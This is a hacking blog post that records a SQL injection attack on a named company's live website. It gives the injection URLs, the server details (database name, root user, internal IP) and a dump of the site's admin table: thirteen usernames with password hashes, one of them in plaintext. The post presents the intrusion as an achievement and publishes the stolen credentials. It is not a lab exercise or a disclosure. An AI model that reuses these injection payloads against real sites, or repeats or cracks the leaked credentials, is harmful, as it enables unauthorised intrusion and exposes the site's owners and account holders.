viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, October 9, 2008

[SQLi] http://www.svoa.co.th/

12:51 AM Posted by viperfx07 No comments


Tool: [+]schemafuzz.py v5
[+]IntelliTamper v2.07
Dump:
[+] URL:http://www.svoa.co.th/product_info.php?id=70237+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
[+] Evasion Used: "+" "--"
[+] 20:36:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: svoaweb
User: root@172.17.10.14
Version: 4.0.15a-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.svoa.co.th/product_info.php?id=70237+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [20:36:08]
[-] Total URL Requests 3
[-] Done


[+] URL:http://www.svoa.co.th/product_info.php?id=70237+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
[+] Evasion Used: "+" "--"
[+] 20:39:36
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: svoaweb
User: root@172.17.10.14
Version: 4.0.15a-log
[+] Dumping data from database "svoaweb" Table "admin"
[+] Column(s) ['user', 'pass']
[+] Number of Rows: 13

[0] user:1a1dc91c907325c69271ddf0c944bc72:
[1] jakkrit:2cc7645821fa3f2560b783faed98646b:
[2] bandit:cf8223718ac82f7d894b908fa7203160:
[3] BUSINESS:256fc6e4dbf98308ceca2b9b924b25af:
[4] walailuk:af16b3104c83b6039dfe070f8792abf0:
[5] janpen:e41fa3d414e8eaca9467ecace739b400:
[6] somyot:54052fc4e361324cbb4095f0a16bece6:
[7] it:it2007:
[8] AMSS:f9e81a746a286bbac225d69520d1e67a:
[9] FRANCHISE:f52e9c50a060add65a035429b2a22229:
[10] nawapornprom:1bf1fb5624fbf5ce51ebc776e7982040:
[11] MDT:f176adcecfa0e6b819a4c55addb0bea9:
[12] JobApply:ef8446f35513a8d6aa2308357a268a7e:ef8446f35513a8d6aa2308357a268a7e:

[-] [20:40:21]
[-] Total URL Requests 15
[-] Done

0 comments:

Post a Comment